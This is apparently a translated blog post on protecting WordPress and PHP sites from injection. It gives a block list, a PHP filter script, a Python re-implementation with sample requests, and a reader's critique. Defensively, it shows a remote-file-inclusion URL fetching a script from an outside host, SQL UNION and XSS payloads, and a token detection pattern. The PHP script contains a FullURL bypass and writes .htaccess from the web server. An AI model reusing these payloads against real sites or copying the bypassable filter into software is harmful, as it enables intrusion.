Blog and website security is a necessity
You probably know that in many cases web pages and blogs get attacked, messed up, or flooded with meaningless anonymous comments automatically, using scripts; quite often the same is done by hand. You would be surprised how large the numbers are. In both cases one method of defence really is to check the requests, IP addresses and other parameters sent by the evildoer, and to block them. Use the methods proposed here not only to defend yourself, but also to discover how far and how often you are being attacked.
Protecting the blog
Although the section below describes a "manual" approach, WordPress has a dedicated protection plugin that makes a site safer and cleaner: the TimesToCome Security Plugin. After you install this plugin you can add your own protection parameters. Personally I use the following blocked IPs, user agents and requests; some of them were caught on the very site shown here (you can also use your own logs). And even though you will see Firefox and Internet Explorer among them, those entries are often bots.
Warning. I take no responsibility for the blocked IPs, User Agents and requests provided here; every visitor must decide for themselves whether any record is appropriate.
| Blocked IP (your IP ban list) | Blocked User Agents (your agent ban list) | Blocked requests (your request blacklist) |
|---|---|---|
| 12.192.82.221 | AnotherBot | $_GET |
What are these requests and why do they need to be blocked? Let's say your site has a loophole, or you simply ended up in an attacker's sights (attackers often just fire a series of offensive queries in a row).
Suppose the file sidebar.php uses the query variable VARIABLE unsafely. With the request sidebar.php?VARIABLE=http://www.kompiuteriszombis.com/botas.txt your server would execute the botas.txt script, and in most cases you can say your server is already hacked.
Website security.
If you have a website, you can use the script below: save it into your index.php and do not forget to change email@email.com to your own e-mail address.
<?php
/******************************* ANTIHACK START ******************************/
// Check for injection: split the requested URI into the path and the query string
$req    = $_SERVER['REQUEST_URI'];
$cadena = explode('?', $req, 2);
$mi_url = $cadena[0];
$resto  = isset($cadena[1]) ? $cadena[1] : '';
// Here you can put your suspicious strings at will. Just be careful that they
// do not coincide with the variables and parameters of your own URLs
$inyecc = '/script|http|<|>|%3c|%3e|SELECT|UNION|UPDATE|exe|exec|INSERT|tmp/i';
// Detecting
// NOTE: any request that carries a FullURL parameter skips this check;
// drop that condition unless your site actually relies on it
if (preg_match($inyecc, $resto) && !isset($_REQUEST['FullURL'])) {
    // Do something, for example send an e-mail alert to the administrator
    // $ip = $_SERVER['HTTP_CLIENT_IP'];
    $ip            = $_SERVER['REMOTE_ADDR'];
    $forwarded     = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : '';
    $remoteaddress = $_SERVER['REMOTE_ADDR'];
    $message = "injection attack in $mi_url\n\nchain: $resto\n\n"
             . "From: (IP-forwa-RA): - $ip - $forwarded - $remoteaddress\n\n"
             . "--- End -------";
    mail('email@email.com', 'Injection Attack', $message,
         "From: info@{$_SERVER['SERVER_NAME']}",
         "-fwebmaster@{$_SERVER['SERVER_NAME']}");
    #### Ban the address in .htaccess too (the web server needs write access to the file)
    $fh = fopen('.htaccess', 'a') or die('Could not open file.');
    $towrite  = "\n# $remoteaddress - $resto";
    $towrite .= "\ndeny from $ip\n";
    fwrite($fh, $towrite);
    fclose($fh);
    ####
    // Kill the message and execution
    echo 'illegal url';
    die();
}
/******************************* ANTIHACK END ********************************/
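As an added example that is not part of the original post, the same token check re-implemented in Python so it can be run offline against constructed sample requests. Unlike the script above it also inspects the path, POST fields and cookies, and the harmless "executive-summary" URL shows the false-positive risk that the comment inside the script warns about (all request data here is made up).

```python
import re
from urllib.parse import unquote_plus

# The same suspicious tokens as the page's $inyecc pattern, matched case-insensitively.
INJECTION_RE = re.compile(
    r"script|http|<|>|%3c|%3e|SELECT|UNION|UPDATE|exe|exec|INSERT|tmp", re.IGNORECASE
)


def find_hits(text, where):
    """Return (where, token) for each suspicious token, checking raw and URL-decoded text."""
    hits = []
    for view in (text, unquote_plus(text)):
        for m in INJECTION_RE.finditer(view):
            hit = (where, m.group(0).lower())
            if hit not in hits:
                hits.append(hit)
    return hits


def inspect_request(uri, post=None, cookies=None):
    """Inspect the path, the query string, POST fields and cookies, not only the text after '?'."""
    path, _, query = uri.partition("?")
    hits = find_hits(path, "path") + find_hits(query, "query")
    for name, value in (post or {}).items():
        hits += find_hits(f"{name}={value}", "post")
    for name, value in (cookies or {}).items():
        hits += find_hits(f"{name}={value}", "cookie")
    return hits


# Constructed sample requests (hypothetical, not real traffic): the page's sidebar.php
# remote-include example, a path-based SQL probe, a POST payload, and a harmless URL.
SAMPLE_REQUESTS = [
    ("/sidebar.php?VARIABLE=http://www.kompiuteriszombis.com/botas.txt", None, None),
    ("/products/1%20UNION%20SELECT%201", None, None),
    ("/comment.php", {"text": "<script>alert(1)</script>"}, {"PHPSESSID": "abc123"}),
    ("/news/executive-summary.html?page=2", None, None),
]


def triage(requests=SAMPLE_REQUESTS):
    """Map each URI to its hits; an empty list means the pattern saw nothing."""
    return {uri: inspect_request(uri, post, cookies) for uri, post, cookies in requests}


if __name__ == "__main__":
    for uri, hits in triage().items():
        print("BLOCK" if hits else "allow", uri, hits)
```

Every sample trips the pattern, including the harmless "executive-summary" page (the "exe" token), which is why the token list must be tuned against your own URLs before blocking anything.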
2008 12 20 10:12
Apache mod_security was created for such things a long time ago; there is no need to reinvent the wheel.
As for the preg pattern: the "ftp" protocol and the "DELETE" SQL query are not mentioned. Also, it examines not only the query values but the variable names too, so before using this code everyone must consider whether it fits their use.
By the way, SQL injection can also be done through the part of the address to the left of the "?".
If the system code is crooked, filtering just GET requests will not be enough protection; POST data and cookies need to be filtered too.
It would be much nicer to see Lithuanian code comments everywhere, not just in some places.
Well, writing into the .htaccess file is not the safest practice. Of course, everything depends on the host system.